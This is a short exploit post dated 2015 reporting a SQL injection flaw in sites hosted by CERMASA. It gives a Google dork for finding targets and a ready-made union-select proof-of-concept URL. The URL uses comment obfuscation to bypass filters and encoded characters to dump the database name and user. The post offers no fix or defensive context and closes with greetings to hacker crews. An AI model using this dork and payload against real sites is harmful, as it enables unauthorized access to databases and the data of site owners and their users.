facebook facebook twitter rss

CERMASA SQL Injection Vulnerability

Author: Anas H4X0R , Published: 29-06-2015
[+] Title  => CERMASA SQL Injection Vulnerability



[+] Date => 29 June 2015



[+] Author & Discovered => Anas H4X0R

Facebook => http://www.fb.com/anas.pico

eMail => haxor137@gmail.com


[+] Tested on : BackBox 3.14


[+] Software Homepage => http://www.cermasa.es



[+] Google Dorks =>

Dork1: intext:alojado por CERMASA+inurl:index.php?id=

########################################################

Exploit : http://www.exemple.com/index.php?id=[sql]

POC :
http://www.exemple.com/index.php?id=-4%20/*!50000union*/+/*!50000select*/%201,CONCAT_WoldS(database(),CHAR(60,%20102,%20111,%20110,%20116,%2032,%2099,%20111,%20108,%20111,%20114,%2061,%2039,%20114,%20101,%20100,%2039,%2062,%2068,%2097,%20116,%2097,%2098,%20115,%20101,%2032,%2061,%2032,%2032,%2060,%2047,%20102,%20111,%20110,%20116,%2062),CHAR(60,%2098,%20114,%2062,%2060,%20102,%20111,%20110,%20116,%2032,%2099,%20111,%20108,%20111,%20114,%2061,%2039,%20114,%20101,%20100,%2039,%2062,%20117,%20115,%20101,%20114,%2032,%2058,%2032,%2060,%2047,%20102,%20111,%20110,%20116,%2062),user()),3,4--

Greetz to : Electronic Atlas Lions Family < Maro Nox - Zoldik Kilwa - Mr.Nemo - Ayoub Frifra - Moroccan Red Light > <3 <3

also : Moroccan Wolf - Abdellah El maghribi - SQL3r - Manual Ayoub & &ll my friends <3 <3

Ramadan Mobarak


Since @ 2013

Like us on Facebook :